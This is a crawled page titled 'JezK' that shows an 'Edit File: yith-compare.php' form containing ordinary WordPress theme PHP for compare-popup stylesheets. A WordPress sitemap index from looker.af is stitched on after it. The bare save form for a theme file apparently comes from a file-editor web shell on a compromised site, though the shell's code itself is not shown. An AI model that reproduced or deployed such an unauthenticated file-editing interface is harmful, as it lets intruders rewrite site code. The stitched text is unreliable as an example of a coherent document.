
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: yith-compare.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
// fix compare
add_action(&#039;yith_woocompare_popup_head&#039;, function (){
    $filenames = array(
        &#039;parent-style&#039;,
        &#039;woocommerce&#039;,
        &#039;woocommerce-archive&#039;,
        &#039;yith-compare&#039;,
    );
    $config = etheme_config_css_files();
    $is_rtl = is_rtl();
    $theme = wp_get_theme();
    foreach ( $filenames as $filename ) {
        if ( !isset($config[$filename])) return;
        if ( $is_rtl ) {
            $rtl_file = get_template_directory() . esc_attr( $config[$filename][&#039;file&#039;]) . &#039;-rtl&#039;.ETHEME_MIN_CSS.&#039;.css&#039;;
            if (file_exists($rtl_file)) {
                $config[$filename][&#039;file&#039;] .= &#039;-rtl&#039;;
            }
        } ?&gt;
        &lt;link rel=&quot;stylesheet&quot; id=&quot;&lt;?php echo &#039;etheme-&#039;.esc_attr( $config[$filename][&#039;name&#039;] ); ?&gt;-css&quot; href=&quot;&lt;?php echo get_template_directory_uri() . esc_attr( $config[$filename][&#039;file&#039;] ) . ETHEME_MIN_CSS; ?&gt;.css?ver=&lt;?php echo esc_attr( $theme-&gt;version ); ?&gt;&quot; type=&quot;text/css&quot; media=&quot;all&quot; /&gt; &lt;?php // phpcs:ignore ?&gt;
        &lt;?php
    }
    ?&gt;
    &lt;link rel=&quot;stylesheet&quot; id=&quot;xstore-icons-css&quot; href=&quot;&lt;?php get_template_directory_uri() . &#039;/css/xstore-icons.css&#039;; ?&gt;&quot; type=&quot;text/css&quot; media=&quot;all&quot; /&gt; &lt;?php // phpcs:ignore ?&gt;
    &lt;style&gt;
        @font-face {
            font-family: &#039;xstore-icons&#039;;
            src:
                url(&#039;&lt;?php echo get_template_directory_uri(); ?&gt;/fonts/xstore-icons-light.ttf&#039;) format(&#039;truetype&#039;),
                url(&#039;&lt;?php echo get_template_directory_uri(); ?&gt;/fonts/xstore-icons-light.woff2&#039;) format(&#039;woff2&#039;),
                url(&#039;&lt;?php echo get_template_directory_uri(); ?&gt;/fonts/xstore-icons-light.woff&#039;) format(&#039;woff&#039;),
                url(&#039;&lt;?php echo get_template_directory_uri(); ?&gt;/fonts/xstore-icons-light.svg#xstore-icons&#039;) format(&#039;svg&#039;);
            font-weight: normal;
            font-style: normal;
            font-display: swap;
        }
    &lt;/style&gt;
    &lt;?php
});</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
